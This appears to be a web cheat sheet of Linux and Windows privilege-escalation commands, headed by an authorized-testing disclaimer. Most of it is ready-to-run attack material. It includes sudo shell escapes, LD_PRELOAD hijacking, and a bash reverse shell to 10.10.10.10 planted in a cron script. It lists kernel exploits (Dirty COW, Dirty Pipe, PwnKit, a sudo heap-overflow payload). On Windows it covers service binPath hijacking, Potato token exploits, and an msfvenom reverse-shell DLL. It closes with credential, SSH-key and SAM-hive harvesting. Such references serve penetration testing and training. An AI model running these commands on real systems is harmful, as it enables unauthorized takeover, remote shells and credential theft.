Loading...
Loading...
Comprehensive guide for Linux and Windows privilege escalation techniques
Authorized Testing Only
Use these techniques only in authorized environments. Unauthorized access is illegal.
Gather information about the Linux system
Check kernel version for known exploits
uname -aIdentify OS distribution and version
cat /etc/issue
cat /etc/*-releaseList processes running as root
ps aux | grep rootShow active network connections
netstat -antup
ss -tunlpList installed software
dpkg -l # Debian
rpm -qa # RedHatFind misconfigured file permissions
Find all SUID executables
find / -perm -4000 -type f 2>/dev/nullFind all SGID executables
find / -perm -2000 -type f 2>/dev/nullFind world-writable files
find / -perm -2 -type f 2>/dev/nullCheck if password files are writable
ls -la /etc/passwd
ls -la /etc/shadowFind writable configuration files
find /etc -writable -type f 2>/dev/nullExploit sudo misconfigurations
List commands user can run with sudo
sudo -lCheck for vulnerable sudo version
sudo -VExploit sudo binaries via GTFOBins
sudo vim -c '!sh'
sudo find . -exec /bin/sh \; -quitPreserve environment with sudo
sudo -E /usr/bin/env /bin/shHijack libraries with LD_PRELOAD
sudo LD_PRELOAD=/tmp/shell.so programExploit scheduled tasks
List all cron jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontabCheck cron directory permissions
ls -la /etc/cron.d
ls -la /var/spool/cronFind writable cron scripts
find /etc/cron* -type f -writable 2>/dev/nullHijack PATH in cron scripts
echo "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" > /tmp/script.shCommon kernel privilege escalation exploits
CVE-2016-5195 - Race condition exploit
gcc -pthread dirty.c -o dirty -lcryptCVE-2022-0847 - Overwrite any file
gcc dirty_pipe.c -o exploitCVE-2021-4034 - pkexec vulnerability
gcc pwnkit.c -o exploitCVE-2021-3156 - sudo heap overflow
sudoedit -s /
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGather information about Windows system
Get system info and installed patches
systeminfo
wmic qfe listGet current user privileges
whoami /all
net user %username%List local users and admins
net user
net localgroup administratorsList all services
sc query state= all
wmic service list briefList all scheduled tasks
schtasks /query /fo LIST /vExploit Windows services for privilege escalation
Find unquoted service paths
wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """Find services with weak permissions
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *Change service binary path
sc config ServiceName binPath= "C:\temp\shell.exe"
sc stop ServiceName
sc start ServiceNameQuery service registry keys
reg query HKLM\SYSTEM\CurrentControlSet\ServicesExploit registry misconfigurations
Check if MSI packages run as SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedFind autorun programs
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunFind writable registry keys
accesschk.exe /accepteula -uvwqk HKLM\SoftwareExploit Windows access tokens
List current token privileges
whoami /privExploit SeImpersonate with JuicyPotato
JuicyPotato.exe -l 1337 -p C:\windows\system32\cmd.exe -t * -c {CLSID}Exploit print spooler service
PrintSpoofer.exe -i -c cmdAlternative to JuicyPotato for newer Windows
RoguePotato.exe -r 10.10.10.10 -e "cmd.exe" -l 9999Exploit DLL search order
Monitor application for DLL loads
procmon.exe # Process Monitor to find missing DLLsFind writable application directories
icacls "C:\Program Files\Application" /grant Everyone:(OI)(CI)FGenerate payload DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll -o evil.dllFind stored passwords
Search for password files
grep -ri "password" /home 2>/dev/null
find / -name "*password*" 2>/dev/nullList stored credentials
cmdkey /list
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"Find SSH private keys
find / -name "id_rsa" -o -name "id_dsa" 2>/dev/nullCheck command history for passwords
cat ~/.bash_history
cat ~/.mysql_historyDump Windows password hashes
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive